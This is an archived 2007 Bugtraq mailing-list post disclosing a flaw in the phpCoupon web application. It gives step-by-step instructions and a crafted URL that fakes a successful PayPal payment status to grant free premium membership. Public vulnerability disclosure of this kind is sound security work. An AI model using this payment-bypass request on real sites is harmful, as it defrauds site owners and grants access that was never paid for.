lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070728051804.14107.qmail@securityfocus.com>
Date: 28 Jul 2007 05:18:04 -0000
From: hack2prison@...oo.com
To: bugtraq@...urityfocus.com
Subject: phpCoupon Vulnerabilities

Discovered by freeprotect.net member
Vendor site: http://phpcoupon.com
====================================
phpCoupon is Developed to provide an affordable and easy to operate local coupon websites for local and niche directory owners and entrepreneurs seeking income opportunites.
It has a security hole. Please show how to exploit following:
1. Click "Business Owners" and register account.
2. Login and show:
-------------------------------------------------
Membership Expiration:	00-00-0000
Maximum Coupons:	0	Coupons Used:	0	Coupons Available:	0
-------------------------------------------------
Meaning you aren't Premium Member.
3. Click "Billing Control Panel"
Click "Buy now" will redirect to paypal.com
OK, now copy this link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX and paste override paypal link.
Note: =upgradeX ---> X is number of coupon you need. Example: http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5
OK now relogin you account you see:
-------------------------------------------------
Membership Expiration:	07-28-2007
Maximum Coupons:	0	Coupons Used:	0	Coupons Available:	0
-------------------------------------------------
You are Premium Member!!!!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ